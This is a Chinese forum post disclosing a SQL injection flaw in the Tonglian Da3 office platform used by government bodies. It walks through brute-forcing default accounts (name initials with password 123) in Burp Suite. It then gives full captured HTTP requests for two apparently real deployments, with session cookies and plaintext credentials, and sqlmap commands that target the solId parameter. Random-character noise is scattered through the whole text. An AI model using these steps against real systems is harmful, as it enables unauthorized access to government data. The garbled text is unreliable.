同联Da3协同办公平台前台通用sql injection漏洞

admin · 发表于 2018-10-20 20:15:17

; n3 N4 ^; {2 A9 X8 t) n1 D, I
8 g1 m8 D( t F

, D+ { N3 ]( J$ M ^: r$ i( R8 N 平台简介： : R" i3 [' W& ?& i; v

: k2 b) N9 f& \ A9 s2 X + m! v) ?7 C b3 B7 Z5 E

# } I1 z( I: v6 ]8 W" ~: u 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ I9 X7 Y; y: v 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
/ \2 @! ]4 S6 j同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ 9 `' `' w- {% B/ }9 y

# W% |' z2 `9 d7 T: D. u4 E & X8 Y% [! r) Q9 t4 `

& J4 J5 ]2 e& Y# V1 H! y 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址：) ]. q' [& l7 B2 T

2 B. ]7 }) H% a* p- @2 u " v3 `/ w$ J; g

! L: ^% d: w8 e" g2 } http://1.1.1.1:7197/cap-aco/#（案例2-）5 I' C) X( [% P1 T. b c2 B. J

' n7 J3 c, Y& C) g http://www.XXOO.com （案例1-官网网站）2 j& o' I) g' f2 Y7 s' ^; n1 k# c

# h6 ]7 L6 p" d/ N' _5 t * i: V8 S) \5 _, b, |& s

( I- Q" T2 X$ [, ^8 K Y! } 漏洞详情: - P, T6 k6 ^5 g2 V: ^

2 e! Z d* a, f! ?% } 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试8 S( L/ v1 D. y

( B) i( H! W% I; `/ D: Y/ X 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图： % B5 r, J" l, H+ `2 m( }

' |5 r5 L+ F9 Z/ [7 a+ c6 J ( K, ]+ o+ e9 }) D6 t

3 H0 j0 g3 J. w% D * v( f% W N$ q3 e0 v

a6 i% w! Q; b0 Z) x7 W status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： u2 ^! a1 ?8 n9 j: k" ]

( m% n2 P6 R/ I R/ s. ^) n" O 1、案例1-官方网站0 a |) t$ ~5 @- J

, L0 g. l6 F; ~7 o" s6 Q" J GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 3 E% ` a* r1 @6 T0 S9 P6 M

3 Q! D( f5 t7 n z* ]6 Q Host: www.XXOO.com/ g* i7 e6 L! t. j) E, }

/ q( h9 B# ~% |+ f) R Proxy-Connection: Keep-Alive 5 q- W* g8 N T0 f

2 y3 x, B2 d8 D, h+ r! s Accept: application/json, text/javascript, */*; q=0.01 ; G4 k0 c- v$ G2 L* |" ~8 T

, {- T* h! G0 R( N Accept-Language: zh-CN# X! f6 E6 H$ H( B

. I3 r6 w: P, F! q6 k5 R Content-Type: application/json ) n) j1 E0 O( R; }% {

. ?2 c6 p4 \/ d$ c, g User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 4 i$ I/ s/ s7 _" E

9 ]) I; M' @) b. S& W |, \ X-Requested-With: XMLHttpRequest 1 ] Z. p* T$ u. d0 j! I* n+ Z

& U& K' Y9 i- u3 d: J" S Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002/ I- y; e y* d

7 ]1 t" j i& Z R$ P( K Accept-Encoding: gzip, deflate, sdch - Y/ d( X# S" {( g& N

/ D% v/ V, R+ L/ h Q* O% |/ i Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e. r, s) C' E3 {. N3 P9 `) k4 @; l

5 x# I k% B2 e 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:+ c$ z* R3 J/ b9 Q) W) q

& R4 N# l% u6 S z * o9 Z4 q; z. I% W( O+ M

$ z4 F2 a4 t x h7 H4 X1 _" W1 {/ d; M

2 Z3 J5 U% N5 _! Z% t7 y0 f . m2 w# }2 F1 {9 `1 j8 x0 w/ H6 W

% V* e* Z# ]+ J3 S9 E6 Y/ x1 { . |3 Y* L. }8 O' c( N

" ?* s9 q, a1 G6 r8 q2 E # V8 I5 s3 t: P! ]

& M$ Z$ K5 Q) g3 |$ @+ ^1 H 2、案例2-某天河云平台 ~. L3 J8 U9 x: Z4 {

* |8 l. N0 ~8 p/ Y) @ GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1: b# _2 t7 |- A) |% X9 m% b5 q

. Q% U8 q# m. } Host: 1.1.1.:7197; F# H( f: j! s- X

, [* Y3 ~& ]/ { @4 g Accept: application/json, text/javascript, */*; q=0.01- o# Y" _4 K* n% h' o5 a

* e5 H) b6 M3 O- ]! i- p T' t4 r X-Requested-With: XMLHttpRequest* q/ G/ x* ^/ y1 ]! p

5 x: J3 L8 [" \7 U User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0& S2 K0 Z; _( x D# u" X d9 R

2 b2 U9 U) k0 }" x. T: m) |9 K% | Content-Type: application/json$ }# d z E- d! n

# {* T* O, f& |5 ?' m1 a Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008$ `* f8 C8 e6 o) \

; `0 E. A) |$ n Accept-Language: zh-CN,zh;q=0.8$ U# C8 ]& q% ~" [3 Y6 c% O

" B# U3 X# }! r7 X5 s+ W- \( d Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 n ?, @" T: x0 e2 b0 I4 u: `

2 M# V2 u. z, l$ L ^ Connection: close j- d& Y7 K2 z) S- Q9 b

) U" D4 r- T1 a 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: # ]0 H: c6 @( J8 O5 c

% u. Q9 s5 y) k# o5 d( s , d; m: y7 U$ x) M: F4 J

$ t4 K6 l2 F2 W! }: s0 ^ i
: @$ C+ g4 y+ `, X* k4 s y

		自动登录	找回密码
密码			立即注册